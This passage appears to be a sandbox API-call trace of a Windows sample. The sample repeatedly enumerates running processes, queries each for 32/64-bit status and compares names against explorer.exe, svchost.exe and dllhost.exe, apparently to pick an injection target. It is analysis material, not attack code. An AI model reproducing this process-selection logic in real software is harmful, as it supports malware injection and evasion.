| out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0211.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0211.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0211.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0211.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0211.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0211.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0211.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0211.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0211.895] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.895] CloseHandle (hObject=0xd8) returned 1 [0211.895] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0211.895] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0211.895] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0211.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0211.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0211.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.896] CloseHandle (hObject=0xd8) returned 1 [0211.896] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0211.896] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0211.896] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0211.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0211.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0211.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0211.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0211.897] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.897] CloseHandle (hObject=0xd8) returned 1 [0211.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0211.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0211.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.898] CloseHandle (hObject=0xd8) returned 1 [0211.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0211.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0211.899] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.899] CloseHandle (hObject=0xd8) returned 1 [0211.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0211.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0211.899] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.899] CloseHandle (hObject=0xd8) returned 1 [0211.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0211.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0211.900] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.900] CloseHandle (hObject=0xd8) returned 1 [0211.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0211.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0211.900] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.900] CloseHandle (hObject=0xd8) returned 1 [0211.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0211.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0211.901] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.901] CloseHandle (hObject=0xd8) returned 1 [0211.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0211.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0211.901] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.902] CloseHandle (hObject=0xd8) returned 1 [0211.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0211.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0211.902] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.902] CloseHandle (hObject=0xd8) returned 1 [0211.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0211.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0211.903] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.903] CloseHandle (hObject=0xd8) returned 1 [0211.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0211.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0211.903] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.903] CloseHandle (hObject=0xd8) returned 1 [0211.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0211.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0211.904] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.904] CloseHandle (hObject=0xd8) returned 1 [0211.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0211.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0211.905] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.905] CloseHandle (hObject=0xd8) returned 1 [0211.905] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0211.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0211.905] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.905] CloseHandle (hObject=0xd8) returned 1 [0211.905] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0211.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0211.906] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.906] CloseHandle (hObject=0xd8) returned 1 [0211.906] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0211.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0211.906] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.906] CloseHandle (hObject=0xd8) returned 1 [0211.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0211.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0211.907] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.907] CloseHandle (hObject=0xd8) returned 1 [0211.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0211.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0211.908] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.908] CloseHandle (hObject=0xd8) returned 1 [0211.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0211.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0211.908] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.908] CloseHandle (hObject=0xd8) returned 1 [0211.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0211.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0211.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.909] CloseHandle (hObject=0xd8) returned 1 [0211.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0211.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0211.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.909] CloseHandle (hObject=0xd8) returned 1 [0211.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0211.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0211.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0211.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0211.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0211.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0211.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0211.913] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.913] CloseHandle (hObject=0xd8) returned 1 [0211.913] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0211.913] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0211.914] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.914] CloseHandle (hObject=0xd8) returned 1 [0211.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0211.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0211.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0211.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0211.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0211.915] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.915] CloseHandle (hObject=0xd8) returned 1 [0211.915] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0211.915] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.915] CloseHandle (hObject=0xd8) returned 1 [0211.915] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0211.915] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0211.916] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.916] CloseHandle (hObject=0xd8) returned 1 [0211.916] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.916] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0211.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0211.917] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0211.917] CloseHandle (hObject=0xd8) returned 1 [0211.917] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0211.918] CloseHandle (hObject=0xd4) returned 1 [0211.918] Sleep (dwMilliseconds=0x3e8) [0212.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0212.936] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0212.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0212.938] Process32Next (in: 